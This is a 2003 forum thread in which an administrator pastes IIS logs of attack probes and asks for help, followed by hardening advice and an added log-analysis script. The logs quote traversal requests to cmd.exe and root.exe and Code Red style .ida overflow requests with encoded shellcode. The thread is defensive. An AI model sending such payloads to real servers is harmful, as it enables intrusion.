Help: how do I keep him out? How do I protect myself?
Our server logs have been full of records like the following for the past few days:
And judging by the server time they come at 2:00 at night, and at 4:00 as well,
which is a bit scary.
The other side seems to never tire of it.
Our server doesn't seem to show any symptoms yet.
The IIS patch won't install; it tells me something about the version being too low??
(I have already applied SP4.)
I don't know how to check what he has actually done,
or what he is trying to do.
The problem is that the other side keeps doing this, continuously.
I really can't stand it any more.
Could everyone take a look:
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /MSADC/root.exe /c+dir 403 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /c/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..蜡../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..翜../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 16 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 16 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /MSADC/root.exe /c+dir 403 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /c/winnt/system32/cmd.exe /c+dir 404 15 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 16 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..蜡../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..翜../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:02:43 202.119.70.193 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /MSADC/root.exe /c+dir 403 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /c/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /d/winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe /c+dir 403 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..?../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..蜡../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..翜../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 07:16:30 202.119.65.74 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-09-02 22:20:16 202.119.68.77 - W3SVC1 PROXY 202.119. 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 0 - - - -
2003-09-02 21:24:35 202.119.68.77 - W3SVC1 PROXY 202.119. 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 0 - - - -
Never mind,
there are too many records,
but they are all repeats of the above.
The last one is used especially often.
I wonder whether he succeeded??
Points: 0, replies: 7
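As an added illustration (not code from the thread or any of its posters), a Python script that parses log lines in the field order the poster shows, tags the two probe types seen above (cmd.exe/root.exe traversal requests and Code Red style .ida requests with %u-encoded queries), counts them per source IP and reports which ones the server answered with HTTP 200. The sample lines are constructed; a real IIS W3C log starts with a `#Fields:` header, and the field order must match that header.

```python
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample in the field order of the lines quoted in the post (not the poster's actual log).
SAMPLE_LOG = """\
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/root.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-08-30 06:19:46 202.119.70.223 - W3SVC1 PROXY 202.119. 80 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 404 0 www - - -
2003-09-02 22:20:16 202.119.68.77 - W3SVC1 PROXY 202.119. 80 GET /default.ida XXXX%u9090%u6858%ucbd3=a 200 0 - - - -
2003-09-02 22:30:00 10.0.0.5 - W3SVC1 PROXY 202.119. 80 GET /index.htm - 200 0 - - - -
"""

def parse_line(line):
    """Split one W3C log line into the fields we need; skip '#' headers and short lines."""
    f = line.split()
    if len(f) < 12 or line.startswith("#"):
        return None
    return {"ip": f[2], "stem": f[9], "query": f[10], "status": int(f[11])}

def classify(stem, query):
    """'unicode' = cmd.exe/root.exe traversal probe, 'ida' = Code Red style .ida request, else None."""
    # %5c, %2f and the overlong %c1%1c / %c0%af forms all aim at the same cmd.exe target,
    # so decode, fold backslashes to slashes and look only at the final path component.
    path = unquote(stem).replace("\\", "/").lower()
    if path.endswith(("/cmd.exe", "/root.exe")):
        return "unicode"
    if path.endswith((".ida", ".idq")) and "%u" in query.lower():
        return "ida"
    return None

def analyze(text):
    """Count probes per source IP and list the ones the server answered with HTTP 200."""
    by_ip = defaultdict(Counter)
    answered = []
    for line in text.splitlines():
        rec = parse_line(line)
        kind = classify(rec["stem"], rec["query"]) if rec else None
        if kind is None:
            continue
        by_ip[rec["ip"]][kind] += 1
        # 404/403 = target missing or denied; 200 = a handler served it, so that mapping needs review
        if rec["status"] == 200:
            answered.append((rec["ip"], kind, rec["stem"]))
    return {"by_ip": {ip: dict(c) for ip, c in by_ip.items()}, "answered": answered}

if __name__ == "__main__":
    for ip, kind, stem in analyze(SAMPLE_LOG)["answered"]:
        print(f"HTTP 200 for {kind} probe from {ip}: {stem}")
```

A 200 on /default.ida shows the .ida ISAPI mapping is still enabled and handled the request; it does not by itself prove a compromise, but removing the unused .ida/.idq mappings turns those requests into 404s.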
#1 zenggao (天空下的云) replied on 2003-09-03 11:47:07, score 0
It is probing for vulnerabilities it can use. Whether your machine has any, I can't say. I suggest finding a book on IIS security and intrusion techniques... IIS has had a lot of security holes, but far fewer since Win2000. When installing IIS, delete the things you don't need, and then keep up with the new patches in this area.
#2 ldqiao (友友) replied on 2003-09-03 11:56:44, score 0
He keeps trying like this,
isn't it annoying?
But how do I check whether my machine has been hit?
#3 liuyann (liuyann) replied on 2003-09-03 14:18:20, score 0
Find a honeypot program and capture it.
Or block this IP in IIS.
#4 ldqiao (友友) replied on 2003-09-03 16:13:19, score 0
I don't want to do that.
I just want to see what he is trying to do,
and whether he has got hold of anything he shouldn't.
#5 sungod8 (琤) (Heros Ⅲ 凤凰) replied on 2003-09-03 16:48:47, score 0
He wants to use the UNICODE, IDA, IDC and similar vulnerabilities to break into your system. Delete all the script files (including the directories) that the IIS installation creates, set up a new directory as the home directory, set the access permissions on that directory, and check whether there is anything unfamiliar in the home directory.
#6 ldqiao (友友) replied on 2003-09-03 20:06:43, score 0
It seems not yet.
Is applying all the patches enough?
#7 YYKLRZ (YYK) replied on 2003-09-03 20:30:21, score 0
Following...